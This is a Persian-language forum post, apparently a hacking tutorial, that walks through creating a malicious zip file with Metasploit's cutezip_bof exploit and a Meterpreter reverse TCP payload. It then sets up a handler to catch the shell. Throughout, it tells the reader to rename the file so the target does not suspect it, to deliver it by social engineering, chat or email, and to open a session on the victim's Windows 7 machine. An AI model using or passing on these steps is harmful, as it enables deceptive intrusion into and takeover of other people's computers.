خوب خوب اینم یه چیز توپ:
در این نوع حمله ما با استفاده از متااسپلویت اقدام به ایجاد یک فایل ورد با پسوند zip میکنیم و سپس این فایل رو از طرق مختلف مثل ( مهندسی اجتماعی – چت – ایمیل و . . . ) به تارگت میدهیم .
بعد از اجرا و باز کردن فایل توسط تاگت ما موتوانیم از سیستم قربانی دسترسی بگیریم .
خوب بریم سراغ اموزش اصلی :
تارکت :Wing FTP 4.3.8
سیستم عامل حمله : بک ترک 5 یا کالی
سیستم عامل تارگت : ویندوز 7
گام اول :در ابتدا وارد بک ترک بشید و یه ترمینال جدید باز کنید و دستور Msfconsole رو بنویسید و اینتر کنید ( البته میتونید از Armitage هم استفاده کنید . تفاوتی نداره ) .
گام دوم : حالا با استفاده از دستور use exploit/windows/fileformat/cutezip_bof وارد محیط اکسپلویت بشید .
گام سوم : در اینجا کافیه یه show options بگیرید تا بهتون بگه چه مقادیری رو باید ست کنید
گام چهارم : مقادیر زیر را عینا ست کنید در صورت اینکه مثلا مشکل پیش اومد خودتون بنویسید
- Code:
-
[center][b]msf exploit (cutezip_bof)>set payload windows/meterpreter/reverse_tcp
[/b][/center]
[b]
[/b]
[b]
[/b]
[b]
[/b]
[center][b]msf exploit (cutezip_bof)>set lhost 192.168.1.2
[/b][/center]
[b]
[/b]
[b]
[/b]
[b]
[/b]
[center][b]msf exploit (cutezip_bof)>exploit[/b][/center]
در اینجا ایپی 192.168.1.2 همون ایپی هکر یا ایپی خودتون هست که باید جایگزین کنید .
گام پنجم : بعد از اکسپلویت یک فایل با پسوند zip و نام msf در شاخه زیر ایجا میشود که باید این فایل رو تغییر نام بدید تا تارگت شک نکنه و متوجه حمله ما نشود .
/root/.msf4/local/msf.zip
و باعد با استفاده از دستورات زیر کامپیوتر خودمون رو اماده گرفتن اکسس از تارگت میکنیم . یه چیزی تو مایه های گوش ایستادن .
- Code:
-
[center][b][size=12][color=#00cccc]use exploit/multi/handler[/color][/size]
[/b][/center]
[center][b][size=12][color=#00cccc]set payload windows/meterpreter/reverse_tcp[/color][/size]
[/b][/center]
[center][b][size=12][color=#00cccc]set lhost 192.168.1.2[/color][/size]
[/b][/center]
[center][size=12][b][color=#00cccc]exploit[/color][/b][/size][/center]
در اخر هم فایل ایجاد شده در مرحله قبل را به هر طریقی که شده به تارگت میدیم تا اجرا کنه . ( چت – مهندسی اجتماعی – ایمیل و . . . ) . به محض باز کردن فایل توسط تارگت ما از سیستم تارگت شل میگیریم و میتونیم برای مرحله بعد حمله خودمون رو اماده کنیم .
برای دسترسی به شل هم کافیه یک بار دستور Sessions -l رو وارد کنید . اگر شل گرفته باشید برای شما نشون میده . که یک ایدی هم داره سپس درستور Sessions -l رو به همراه ایدی وارد کنید تا به شل تارگت وصل بشید . به این ترتیب :
FreeBuzz Team This Is For Fun Ha Ha Ha!
sessions -i ID